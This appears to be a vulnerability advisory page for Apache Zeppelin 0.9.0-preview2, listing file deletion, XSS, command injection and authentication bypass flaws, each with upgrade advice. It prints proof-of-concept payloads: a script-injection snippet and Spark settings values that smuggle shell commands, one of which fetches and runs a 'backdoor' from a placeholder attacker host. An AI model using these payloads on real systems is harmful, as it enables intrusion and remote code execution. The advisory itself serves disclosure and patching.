org.apache.zeppelin:zeppelin@0.9.0-preview2 vulnerabilities

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Improper Input Validation in Move folder to Trash feature allowing an attacker to delete arbitrary files.

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the markdown interpreter of Apache Zeppelin, which allows an attacker to inject malicious scripts.

PoC

%md
foo
<script>alert(String.fromCharCode(88,83,83))</script>
bar
<bold onclick='alert("a");'>qqq</bold>

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Command Injection. Bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings.

PoC

# Insert into Spark interpreter settings
# This example will also crash Spark jobs because command line is truncated
spark.executor.memory=16g;touch${IFS%?}/tmp/test

# Or another example, in this case Spark jobs will be executed normally without interruption 
spark.driver.cores=2`{wget,-O,/tmp/x,http://attacker_server:443/backdoor};{chmod,0755,/tmp/x};{bash,-c,/tmp/x}`

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.

org.apache.zeppelin:zeppelin is a web-based notebook that enables interactive data analytics.

Affected versions of this package are vulnerable to Access Restriction Bypass. An Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user.

Upgrade org.apache.zeppelin:zeppelin to version 0.10.0 or higher.